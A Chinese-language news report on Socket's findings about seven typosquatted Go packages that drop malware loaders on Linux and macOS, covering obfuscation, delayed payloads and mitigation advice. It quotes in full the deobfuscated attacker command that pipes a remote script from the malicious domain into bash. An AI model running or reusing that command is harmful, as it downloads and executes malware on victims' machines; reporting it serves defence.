Socket揭露了一场域名抢注活动，该活动通过恶意Go软件包向Linux和macOS系统投放恶意软件。了解所使用的策略，包括混淆和域名抢注，并了解如何保持安全。

软件供应链安全解决方案提供商Socket的网络安全研究人员发现了一个令人担忧的新趋势：恶意行为者越来越多地将目标对准Go编程语言网络中的开发人员。

通过采用一种称为域名抢注的技术，这些攻击者将恶意软件伪装成合法的 Go 软件包进行分发，这些恶意软件旨在在Linux和macOS系统上安装隐藏的恶意软件加载程序。

Socket分享的调查显示，攻击者在Go Module Mirror(Go模块的中央存储库)上发布了至少七个此类欺骗性软件包。完整列表包括：
github.com/vainreboot/layout
github.com/utilizedsun/layout
github.com/thankfulmai/hypert
github.com/shallowmulti/hypert
github.com/ornatedoctrin/layout
github.com/shadowybulk/hypert
github.com/belatedplanet/hypert

这些软件包模拟了流行的库，包括用于测试HTTP API客户端的“hypert”和用于UI开发的“layout”。

“hypert”计划似乎是专门针对金融领域的开发商。

此恶意软件包包含可实现远程代码执行的隐藏功能(例如qcJjJne())。导入项目后，恶意代码会悄悄地从远程服务器(alturastreeticu)下载并执行脚本，进而安装可能窃取敏感数据或凭据的可执行文件。

为了逃避检测，攻击者采用了各种技术。例如，他们利用基于数组的字符串混淆来隐藏代码中的恶意命令，使传统安全工具难以识别威胁。例如，命令

wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash& 被拆分成单字符串并使用非连续索引进行重建。

此外，恶意脚本还包含时间延迟，等待一小时后再获取最终的有效负载，这有助于它们规避注重立即采取行动的安全措施。

此次攻击活动中使用的恶意域名通常与合法网站相似，尤其是与金融机构相关的网站。这种策略被称为域名抢注，旨在利用用户对熟悉名称和品牌的信任来欺骗用户。

攻击者还在不同的域和IP地址上重复使用类似的有效载荷和文件名，表明他们进行了协调且持久的努力。

例如，f0eee999 ELF文件显示了最初的最小恶意行为，例如读取/sys/kernel/mm/transparent_hugepage/，与加密矿工或加载程序对齐，直到条件满足时才处于休眠状态。研究人员指出，该文件以及a31546bf脚本已在Mads Hougesen的研究“侠盗一号：恶意软件故事”中被观察到，这表明存在潜在联系和更广泛的趋势。

Socket的研究强调了与软件供应链攻击相关的日益增长的风险，恶意行为者以开发人员为目标并破坏广泛使用的库和软件包的完整性。

建议开发人员在将外部软件包合并到项目中时保持警惕。实时扫描工具和浏览器扩展、代码审核和谨慎的依赖管理实践至关重要。开发人员还应验证软件包的完整性、监控新的存储库并在社区内分享入侵指标。

总部位于马萨诸塞州伯灵顿的应用安全解决方案提供商Black Duck首席顾问、网络和红队实践总监Thomas Richards对最新进展发表评论称，

“这次域名抢注攻击并不是一个新的攻击媒介，但它仍然强调了管理软件风险和在将模块集成到源代码之前验证模块合法性的重要性。验证软件包通常是在将它们添加到中央存储库之前对其进行签名。任何使用Go开发的应用程序都应立即接受审查，以确保不存在恶意软件包，并且系统没有受到损害。“